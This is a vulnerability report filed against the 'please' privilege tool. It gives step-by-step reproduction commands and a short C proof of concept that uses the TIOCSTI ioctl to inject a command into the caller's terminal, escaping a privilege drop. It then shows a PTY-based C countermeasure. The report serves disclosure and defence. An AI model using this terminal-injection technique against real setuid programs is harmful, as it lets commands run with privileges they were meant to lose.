[Git master] Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
Hi!
I believe that please is vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX. Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
    const char *text = "id\n";
    while (*text)
        ioctl(0, TIOCSTI, text++);
    return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
- This affects both the case where root wants to drop privileges as well as when non-root wants to gain other privileges.
- ttyjack allows playing with TIOCSTI and TIOCLINUX comfortably.
- Of the three known options for countermeasures, use of a PTY is currently considered the best solution.
- For a list of other software known to be affected by this issue see https://github.com/hartwork/antijack#related-cves-not-mine .
- The code above is inspired by https://github.com/containers/bubblewrap/issues/142 .
Best, Sebastian
Edited by Sebastian Pipping
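The PTY countermeasure the report names, as an added example that is not the please project's code: the target command is started on a freshly allocated pseudo-terminal that becomes its controlling tty, so a TIOCSTI or TIOCLINUX issued by the child only reaches that pty and never the invoking user's terminal. The function name `run_on_pty` and the relay loop are my own; the example assumes a Linux/glibc host.

```c
/* Added example: run a command on its own pty so terminal ioctls it issues
 * (TIOCSTI, TIOCLINUX) target that pty rather than the caller's terminal. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs argv on a new pty, relaying our stdin to it and its output to our
 * stdout. Returns the child's exit status, or -1 on failure. */
int run_on_pty(char *const argv[]) {
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) return -1;
    const char *slave_name = ptsname(master);   /* e.g. /dev/pts/N */
    if (!slave_name) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        close(master);
        setsid();                           /* leave the caller's session and tty */
        int slave = open(slave_name, O_RDWR);
        if (slave < 0) _exit(127);
        ioctl(slave, TIOCSCTTY, 0);         /* the new pty is now our controlling tty */
        dup2(slave, 0); dup2(slave, 1); dup2(slave, 2);
        if (slave > 2) close(slave);
        execvp(argv[0], argv);
        _exit(127);
    }
    /* Parent: shuttle bytes until the child hangs up its side of the pty. */
    struct pollfd fds[2] = { { STDIN_FILENO, POLLIN, 0 }, { master, POLLIN, 0 } };
    char buf[4096];
    for (;;) {
        if (poll(fds, 2, -1) < 0) break;
        if (fds[0].revents) {               /* readable, closed, or not open at all */
            ssize_t n = read(STDIN_FILENO, buf, sizeof buf);
            if (n <= 0) fds[0].fd = -1;     /* stop polling stdin after EOF */
            else if (write(master, buf, (size_t)n) < 0) break;
        }
        if (fds[1].revents) {
            ssize_t n = read(master, buf, sizeof buf);
            if (n <= 0) break;              /* EIO once the child has exited */
            if (write(STDOUT_FILENO, buf, (size_t)n) < 0) break;
        }
    }
    close(master);
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A wrapper like please would additionally put the caller's terminal into raw mode and forward window-size changes, which this relay omits.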